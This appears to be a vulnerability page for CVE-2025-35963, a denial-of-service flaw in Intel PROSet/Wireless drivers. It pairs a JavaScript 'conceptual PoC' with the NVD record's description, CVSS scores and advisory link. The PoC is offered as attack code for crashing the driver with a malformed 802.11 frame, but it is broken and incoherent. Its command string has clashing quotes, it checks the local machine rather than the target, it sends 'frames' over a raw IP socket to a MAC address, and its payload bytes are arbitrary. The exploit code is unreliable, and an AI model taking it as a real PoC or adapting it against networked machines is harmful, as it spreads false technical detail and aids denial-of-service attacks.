CVE-2025-35963

// CVE-2025-35963 PoC - Intel WiFi Driver DoS // Note: This is a conceptual PoC for educational purposes only const { execSync } = require('child_process'); // Check if target is vulnerable function checkVulnerability() { try { const output = execSync('wmic product where "name like '%Intel%PROSet%' get version', { encoding: 'utf8' }); const versionMatch = output.match(/(\d+\.\d+)/); if (versionMatch) { const version = parseFloat(versionMatch[1]); return version < 23.160; } } catch (e) { console.log('Unable to determine Intel PROSet version'); } return false; } // Send malformed 802.11 frame to trigger driver vulnerability function sendMalformedFrame(targetMAC) { const rawSocket = require('raw-socket'); const options = { protocol: rawSocket.Protocol.NONE }; const socket = rawSocket.createSocket(options); // Craft malformed frame with invalid length field const maliciousFrame = Buffer.alloc(512); maliciousFrame.writeUInt8(0x08, 0); // Frame type: Data maliciousFrame.writeUInt8(0x00, 1); // Flags maliciousFrame.writeUInt16LE(0xFFFF, 2); // Invalid duration // Fill rest with pattern to trigger parsing error for (let i = 4; i < 512; i++) { maliciousFrame.writeUInt8(i % 256, i); } socket.send(maliciousFrame, 0, maliciousFrame.length, targetMAC); socket.close(); } // Main execution if (checkVulnerability()) { console.log('[+] Target is vulnerable to CVE-2025-35963'); console.log('[!] Sending malformed frames to trigger DoS...'); // In real scenario: sendMalformedFrame(targetIP); } else { console.log('[-] Target is not vulnerable or Intel PROSet not installed'); } console.log('Note: Actual exploitation requires being on same network segment as target');

{"cve": {"id": "CVE-2025-35963", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:51.020", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient control flow management for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-691"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01398.html", "source": "[email protected]"}]}}